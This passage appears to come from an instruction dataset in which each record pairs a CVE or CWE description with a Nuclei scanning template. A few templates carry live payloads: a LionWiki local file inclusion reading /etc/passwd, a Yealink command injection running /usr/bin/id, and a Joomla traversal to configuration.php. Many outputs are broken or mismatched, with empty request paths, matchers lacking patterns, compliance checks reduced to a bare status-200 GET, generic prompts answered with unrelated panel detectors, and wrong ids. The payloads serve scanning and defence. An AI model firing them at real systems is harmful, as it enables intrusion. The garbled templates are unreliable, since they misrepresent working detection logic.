sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: esphome-panel\n\ninfo:\n name: ESPHome Login Panel - Detect\n author: fabaff\n severity: info\n description: ESPHome login panel was detected.\n tags: panel,esphome,iot,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: word\n words:\n - \"class=\"esphome-header\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2020-27191", "input": "Title: Unknown Vulnerability in lionwiki lionwiki\nSummary: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted string in the index.php f1 variable, aka Local File Inclusion. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: lionwiki lionwiki\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-27191\n\ninfo:\n name: LionWiki <3.2.12 - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted strings in the index.php f1 variable, aka local file inclusion.\n tags: cve2020,cve,lionwiki,lfi,oss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2020-27191"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: asus-router-panel\n\ninfo:\n name: Asus Router Login Panel - Detect\n author: arafatansari\n severity: info\n description: Asus router login panel was detected.\n tags: panel,asus,router,iot,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Main_Login.asp\" \n matchers:\n - type: word\n words:\n - \"ASUS Login\" \n - \"Sign in with your ASUS router account\" \n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: spotify phishing Detection", "input": "Title: spotify phishing Detection\nSummary: spotify phishing Detection. A spotify phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: spotify-phish\n\ninfo:\n name: spotify phishing Detection\n author: rxerium\n severity: info\n description: A spotify phishing website was detected\n tags: phishing,spotify,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Spotify - Web Player: Music for everyone\" \n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "spotify-phish"} {"instruction": "Generate a Nuclei template for CVE-2019-17503", "input": "Title: Vulnerability (CWE-425) in kirona dynamic_resource_scheduling\nSummary: An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly: it contains sensitive information about the database through the SQL queries within this batch file. This file exposes SQL database information such as database version, table name, column name, etc.\nVulnerability Type: Vulnerability (CWE-425)\nSeverity: medium\nAffected Products: kirona dynamic_resource_scheduling\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-17503\n\ninfo:\n name: Kirona Dynamic Resource Scheduler - Information Disclosure\n author: LogicalHunter\n severity: medium\n description: Kirona Dynamic Resource Scheduler is susceptible to information disclosure. An unauthenticated user can directly access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd), which contains sensitive information with exposed SQL queries, such as database version, table name, and column name.\n tags: cve,cve2019,exposure,edb,packetstorm,kirona,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/osm/REGISTER.cmd\" \n - \"{{BaseURL}}/osm_tiles/REGISTER.cmd\" \n matchers:\n - type: word\n words:\n - \"DEBUGMAPSCRIPT=TRUE\" \n - \"@echo off\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2019-17503"} {"instruction": "Generate a Nuclei template for: Reposilite Login Panel - Detect", "input": "Title: Reposilite Login Panel - Detect\nSummary: Reposilite Login Panel - Detect. Reposilite products was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: reposilite-panel\n\ninfo:\n name: Reposilite Login Panel - Detect\n author: righettod\n severity: info\n description: Reposilite products was detected.\n tags: panel,reposilite,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "reposilite-panel"} {"instruction": "Generate a Nuclei template for: CodeMeter Webadmin Dashboard", "input": "Title: CodeMeter Webadmin Dashboard\nSummary: CodeMeter Webadmin Dashboard. CodeMeter Webadmin Dashboard is exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: codemeter-webadmin\n\ninfo:\n name: CodeMeter Webadmin Dashboard\n author: DhiyaneshDk\n severity: low\n description: CodeMeter Webadmin Dashboard is exposed.\n tags: misconfig,exposure,codemeter,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.html\" \n matchers:\n - type: word\n words:\n - \"WebAdmin | Dashboard\" \n - \"CodeMeter\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "codemeter-webadmin"} {"instruction": "Generate a Nuclei template for: ElastiCache Redis In-Transit and At-Rest Encryption - Disabled", "input": "Title: ElastiCache Redis In-Transit and At-Rest Encryption - Disabled\nSummary: ElastiCache Redis In-Transit and At-Rest Encryption - Disabled. Ensure that your Amazon ElastiCache Redis cache clusters are encrypted in order to meet security and compliance requirements.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: cache-redis-encryption-disabled\n\ninfo:\n name: ElastiCache Redis In-Transit and At-Rest Encryption - Disabled\n author: DhiyaneshDK\n severity: high\n description: Ensure that your Amazon ElastiCache Redis cache clusters are encrypted in order to meet security and compliance requirements.\n tags: cloud,devops,aws,amazon,elasticache,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "cache-redis-encryption-disabled"} {"instruction": "Generate a Nuclei template for: Shopify Access Token (Public App)", "input": "Title: Shopify Access Token (Public App)\nSummary: Shopify Access Token (Public App). Tags: file, keys, shopify\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: shopify-public-access\n\ninfo:\n name: Shopify Access Token (Public App)\n author: DhiyaneshDK\n severity: info\n description: Shopify Access Token (Public App)\n tags: file,keys,shopify,token\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "shopify-public-access"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: api-dbt\n\ninfo:\n name: dbt Cloud API - Test\n author: dwisiswant0\n severity: info\n description: dbt Cloud API test was conducted.\n tags: token-spray,dbt\n\nhttp:\n - method: GET\n path:\n - \"https://cloud.getdbt.com/api/v2/accounts/\" \n matchers:\n - type: word\n words:\n - \"Invalid token\" \n - \"Authentication credentials were not provided.\" \n - \"User API Keys are deprecated\" \n part: body\n condition: or", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: UserGate NGFW/UTM Admin Panel - Detect", "input": "Title: UserGate NGFW/UTM Admin Panel - Detect\nSummary: UserGate NGFW/UTM Admin Panel - Detect. Detect UserGate NGFW/UTM Admin Panel.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: usergate-ngfw-admin-panel\n\ninfo:\n name: UserGate NGFW/UTM Admin Panel - Detect\n author: darses\n severity: info\n description: Detect UserGate NGFW/UTM Admin Panel.\n tags: detect,panel,usergate,ngfw,utm,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/static/console-utm-webui/js/preinit.js\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "info", "id": "usergate-ngfw-admin-panel"} {"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Yandex Social", "input": "Title: Content-Security-Policy Bypass - Yandex Social\nSummary: Content-Security-Policy Bypass - Yandex Social. Tags: xss, csp-bypass, yandex-social\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: yandex-social-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Yandex Social\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Yandex Social\n tags: xss,csp-bypass,yandex-social,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"yandex.ru\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "yandex-social-csp-bypass"} {"instruction": "Generate a Nuclei template for CVE-2021-27561", "input": "Title: OS Command Injection in yealink device_management\nSummary: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: yealink device_management\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-27561\n\ninfo:\n name: YeaLink DM 3.6.0.20 - Remote Command Injection\n author: shifacyclewala,hackergautam\n severity: critical\n description: Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.\n tags: cve2021,cve,rce,yealink,mirai,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;\" \n matchers:\n - type: word\n words:\n - \"uid\" \n - \"gid\" \n - \"groups\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2021-27561"} {"instruction": "Generate a Nuclei template for: Zipline - Installer", "input": "Title: Zipline - Installer\nSummary: Zipline - Installer. Zipline installer setup was detected.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: zipline-installer\n\ninfo:\n name: Zipline - Installer\n author: pussycat0x\n severity: critical\n description: Zipline installer setup was detected.\n tags: misconfig,setup,zipline,installer,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/setup\" \n matchers:\n - type: word\n words:\n - \"Setup Zipline\" \n - \"Configuration\" \n - \"Create a super-admin account\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "critical", "id": "zipline-installer"} {"instruction": "Generate a Nuclei template for CVE-2022-3142", "input": "Title: SQL Injection in basixonline nex-forms\nSummary: The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: basixonline nex-forms\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-3142\n\ninfo:\n name: NEX-Forms Plugin < 7.9.7 - SQL Injection\n author: r3Y3r53\n severity: high\n description: The NEX-Forms WordPress plugin before 7.9.7 does not properly sanitise and escape user input before using it in SQL statements, leading to SQL injections. The attack can be executed by anyone who is permitted to view the forms statistics chart, by default administrators, however can be configured otherwise via the plugin settings.\n tags: time-based-sqli,cve,cve2022,wpscan,packetstorm,wordpress,sqli,wp-plugin,wp,authenticated,basixonline,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2022-3142"} {"instruction": "Generate a Nuclei template for CVE-2023-3710", "input": "Title: Vulnerability (CWE-20) in honeywell pm43_firmware\nSummary: Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004.\u00a0Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: critical\nAffected Products: honeywell pm43_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-3710\n\ninfo:\n name: Honeywell PM43 Printers - Command Injection\n author: win3zz\n severity: critical\n description: Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)\n tags: cve2023,cve,honeywell,pm43,printer,iot,rce,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"Release date\" \n part: body\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2023-3710"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: opennebula-panel\n\ninfo:\n name: OpenNebula Login Panel - Detect\n author: kh4sh3i,darses\n severity: info\n description: OpenNebula login panel was detected.\n tags: panel,opennebula,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"OpenNebula\" \n - \"OpenNebula Systems\" \n - \"target=\"_blank\">OpenNebula\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Advantech R-SeeNet Detection", "input": "Title: Advantech R-SeeNet Detection\nSummary: Advantech R-SeeNet Detection. Tags: tech, rseenet, discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: rseenet-detect\n\ninfo:\n name: Advantech R-SeeNet Detection\n author: pdteam\n severity: info\n description: Advantech R-SeeNet Detection\n tags: tech,rseenet,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "rseenet-detect"} {"instruction": "Generate a Nuclei template for CVE-2015-4455", "input": "Title: Unrestricted File Upload in aviary_image_editor_add-on_for_gravity_forms_project aviary_image_editor_add-on_for_gravity_forms\nSummary: Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.\nVulnerability Type: Unrestricted File Upload\nSeverity: critical\nAffected Products: aviary_image_editor_add-on_for_gravity_forms_project aviary_image_editor_add-on_for_gravity_forms\nIndicators: error, vulnerability detected", "output": "id: CVE-2015-4455\n\ninfo:\n name: WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload\n author: MaStErChO\n severity: critical\n description: Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.\n tags: cve,cve2015,packetstorm,intrusive,file-upload,wordpress,aviary_image_editor_add-on_for_gravity_forms_project,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2015-4455"} {"instruction": "Generate a Nuclei template for: Webalizer Statistics Information Disclosure", "input": "Title: Webalizer Statistics Information Disclosure\nSummary: Webalizer Statistics Information Disclosure. The remote host is running the Webalizer Report generator. Webalizer parses web logs and gives a potential attacker information regarding hosts that have accessed the server, resources accessed, total statistics for the Web server, version of Web server, and more.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: webalizer-statistics\n\ninfo:\n name: Webalizer Statistics Information Disclosure\n author: 0x_Akoko\n severity: low\n description: The remote host is running the Webalizer Report generator. Webalizer parses web logs and gives a potential attacker information regarding hosts that have accessed the server, resources accessed, total statistics for the Web server, version of Web server, and more.\n tags: webalizer,logs,statistics,tenable,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/stats/index.html\" \n matchers:\n - type: word\n words:\n - \"Generated by The Webalizer\" \n - \"Usage Statistics\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "webalizer-statistics"} {"instruction": "Generate a Nuclei template for: Owncloud StatusPage detection", "input": "Title: Owncloud StatusPage detection\nSummary: Owncloud StatusPage detection. Tags: tech, owncloud, status\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: owncloud-status-page\n\ninfo:\n name: Owncloud StatusPage detection\n author: myztique,invisiblethreat\n severity: info\n description: Owncloud StatusPage detection\n tags: tech,owncloud,status,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/status.php\" \n matchers:\n - type: word\n words:\n - \"\"versionstring\":\" \n - \"\"installed\":\" \n - \"\"edition\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "owncloud-status-page"} {"instruction": "Generate a Nuclei template for: Ensure etcd-cafile argument set", "input": "Title: Ensure etcd-cafile argument set\nSummary: Ensure etcd-cafile argument set. Checks if the etcd-cafile argument is properly set in the etcd configuration, crucial for secure client connections to etcd.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: k8s-etcd-cafile-set\n\ninfo:\n name: Ensure etcd-cafile argument set\n author: princechaddha\n severity: medium\n description: Checks if the etcd-cafile argument is properly set in the etcd configuration, crucial for secure client connections to etcd.\n tags: cloud,devops,kubernetes,devsecops,etcd,k8s,k8s-cluster-security\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "k8s-etcd-cafile-set"} {"instruction": "Generate a Nuclei template for: rlogin Service Should Be Disabled", "input": "Title: rlogin Service Should Be Disabled\nSummary: rlogin Service Should Be Disabled. Assessed the operational status of the rlogin service on the system.Running rlogin could have allowed unauthorized users to gain access or extract sensitive information, representing a significant security risk.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: linux-rlogin-service\n\ninfo:\n name: rlogin Service Should Be Disabled\n author: songyaeji\n severity: high\n description: Assessed the operational status of the rlogin service on the system.Running rlogin could have allowed unauthorized users to gain access or extract sensitive information, representing a significant security risk.\n tags: linux,local,audit,kisa,compliance\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "linux-rlogin-service"} {"instruction": "Generate a Nuclei template for: Virtual Machine Disk Encryption with Customer-Supplied Keys Not Enabled", "input": "Title: Virtual Machine Disk Encryption with Customer-Supplied Keys Not Enabled\nSummary: Virtual Machine Disk Encryption with Customer-Supplied Keys Not Enabled. Ensure that the disks attached to your production Google Compute Engine instances are encrypted with Customer-Supplied Encryption Keys (CSEKs) in order to have complete control over the data-at-rest encryption and decryption process. CSEKs allow you to provide your own encryption keys that Google Compute Engine uses to protect the Google-generated keys used to encrypt and decrypt your instance data.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: gcloud-vm-disk-csek-not-enabled\n\ninfo:\n name: Virtual Machine Disk Encryption with Customer-Supplied Keys Not Enabled\n author: princechaddha\n severity: high\n description: Ensure that the disks attached to your production Google Compute Engine instances are encrypted with Customer-Supplied Encryption Keys (CSEKs) in order to have complete control over the data-at-rest encryption and decryption process. CSEKs allow you to provide your own encryption keys that Google Compute Engine uses to protect the Google-generated keys used to encrypt and decrypt your instance data.\n tags: cloud,devops,gcp,gcloud,compute,encryption,csek,security,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "gcloud-vm-disk-csek-not-enabled"} {"instruction": "Generate a Nuclei template for: BitBucket Client ID", "input": "Title: BitBucket Client ID\nSummary: BitBucket Client ID. Tags: bitbucket, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: bitbucket-clientid\n\ninfo:\n name: BitBucket Client ID\n author: DhiyaneshDK\n severity: info\n description: BitBucket Client ID\n tags: bitbucket,exposure,tokens,clientid,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "bitbucket-clientid"} {"instruction": "Generate a Nuclei template for: Detect Agentejo Cockpit", "input": "Title: Detect Agentejo Cockpit\nSummary: Detect Agentejo Cockpit. Tags: tech, cockpit, discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: cockpit-detect\n\ninfo:\n name: Detect Agentejo Cockpit\n author: dwisiswant0\n severity: info\n description: Detect Agentejo Cockpit\n tags: tech,cockpit,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth/login\" \n matchers:\n - type: word\n words:\n - \"Authenticate Please!\"", "category": "generic", "severity": "info", "id": "cockpit-detect"} {"instruction": "Generate a Nuclei template for: Hongfan OA ioAssistance.asmx - Remote Code Execution", "input": "Title: Hongfan OA ioAssistance.asmx - Remote Code Execution\nSummary: Hongfan OA ioAssistance.asmx - Remote Code Execution. There is a SQL injection vulnerability in Hongfan iOffice 10 Hospital Edition, which can be exploited by attackers to obtain sensitive database information.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: hongfan-ioffice-rce\n\ninfo:\n name: Hongfan OA ioAssistance.asmx - Remote Code Execution\n author: SleepingBag945\n severity: high\n description: There is a SQL injection vulnerability in Hongfan iOffice 10 Hospital Edition, which can be exploited by attackers to obtain sensitive database information.\n tags: hongfan,oa,sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body\n condition: or\n - type: word\n words:\n - \"text/xml\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "hongfan-ioffice-rce"} {"instruction": "Generate a Nuclei template for CVE-2010-3203", "input": "Title: Path Traversal in xmlswf com_picsell\nSummary: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: xmlswf com_picsell\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-3203\n\ninfo:\n name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.\n tags: cve,cve2010,edb,joomla,lfi,xmlswf,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2010-3203"} {"instruction": "Generate a Nuclei template for: CoreBos - .htaccess File Exposure", "input": "Title: CoreBos - .htaccess File Exposure\nSummary: CoreBos - .htaccess File Exposure. CoreBos was discovered to have .htaccess file exposed to public which includes sensitive information.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: corebos-htaccess\n\ninfo:\n name: CoreBos - .htaccess File Exposure\n author: arafatansari\n severity: info\n description: CoreBos was discovered to have .htaccess file exposed to public which includes sensitive information.\n tags: exposure,corebos,huntr,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/htaccess.txt\" \n matchers:\n - type: word\n words:\n - \"Options -Indexes\" \n - \"Watcher\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "watcher-panel"} {"instruction": "Generate a Nuclei template for CVE-2024-8522", "input": "Title: SQL Injection in thimpress learnpress\nSummary: The LearnPress \u2013 WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: thimpress learnpress\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-8522\n\ninfo:\n name: LearnPress < 4.2.7.1 - SQL Injection\n author: pdresearch,iamnoooob,rootxharsh\n severity: critical\n description: The LearnPress - WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n tags: time-based-sqli,cve,cve2024,learnpress,sqli,wp,wordpress,wp-plugin,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-8522"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: amazon-ecs-defualt-page\n\ninfo:\n name: Amazon ECS Sample App Default Page - Detect\n author: Splint3r7\n severity: info\n description: Amazon ECS Sample App Default Page was detected.\n tags: amazon,tech,default,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Docker Daemon Exposed", "input": "Title: Docker Daemon Exposed\nSummary: Docker Daemon Exposed. Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system.\n\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: exposed-dockerd\n\ninfo:\n name: Docker Daemon Exposed\n author: arafatansari\n severity: critical\n description: Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system.\n tags: network,docker,exposure,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "critical", "id": "exposed-dockerd"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: api-vercel\n\ninfo:\n name: Vercel - API Detection\n author: dwisiswant0\n severity: info\n description: Vercel API was detected.\n tags: token-spray,vercel\n\nhttp:\n - method: GET\n path:\n - \"https://api.vercel.com/www/user\" \n matchers:\n - type: word\n words:\n - \"\"user\":\" \n - \"\"username\":\" \n - \"\"email\":\" \n part: body\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2021-20090", "input": "Title: Path Traversal in buffalo wsr-2533dhpl2-bk_firmware and others\nSummary: A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass 